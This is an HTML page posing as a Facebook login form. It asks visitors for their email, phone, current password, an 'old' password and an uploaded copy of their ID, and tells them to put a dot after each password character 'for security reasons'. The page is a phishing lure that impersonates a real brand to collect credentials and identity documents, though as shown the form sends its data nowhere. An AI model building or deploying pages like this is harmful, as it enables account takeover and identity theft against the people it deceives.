<!DOCTYPE html> 
<html> 
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title> Login Page </title>
<style> 
Body {
  font-family: Calibri, Helvetica, sans-serif;
  background-color: white;
}
button { 
       background-color: #3b5998; 
       width: 100%;
        color: white;
        align: right; 
        padding: 10px; 
        margin: 10px 0px;
       border-radius: 5px 5px 5px ;
       align: right; 
        border: none; 
        cursor: pointer; 
         } 
 form { 
        border: 1px solid black; 
    } 
 input[type=text], input[type=password] { 
        width: 100%; 
        margin: 8px 0;
        padding: 12px 20px; 
        display: inline-block; 
        border: 1px solid black; 
        box-sizing: border-box; 
    }
 button:hover { 
        opacity: 0.7; 
    } 

      
   
 .container { 
        padding: 25px; 
        background-color: white;
        border-radius: 5px 5px 5px;
    }
 h2 {
     background-color: #3b5998;
     color: white;
     padding: 15px;
     height: 20%;
    } 
 
          font-size: 200%;
    
</style> 
</head>  
<body>  
    <center> <h2> facebook </h2> </center> 
    <form>
        <div class="container"> 
            <label>Email: </label> 
            <input type="text" placeholder="Enter Email" name="Enter your Email" requird> 
 <label>Phone: </label> 
            <input type="text" placeholder="Enter Phone" name="Enter your Phone" requird>                  
            <label>Password : </label> 
            <input type="password" placeholder="Enter Password" name="password" required>
<p style="font-size:160%;">
please place a dot after each character of your password for security reasons.</p>            
             <input type="password" placeholder="Enter any old Password" name="password" required>
 <p> Please attach a copy of your ID(s).</p>

          
       <input type="file" id="myFile" name="filename">                 
             
                                
            <button type="submit">send</button> 
            
        </div> 
    </form>   
</body>   
</html>

 








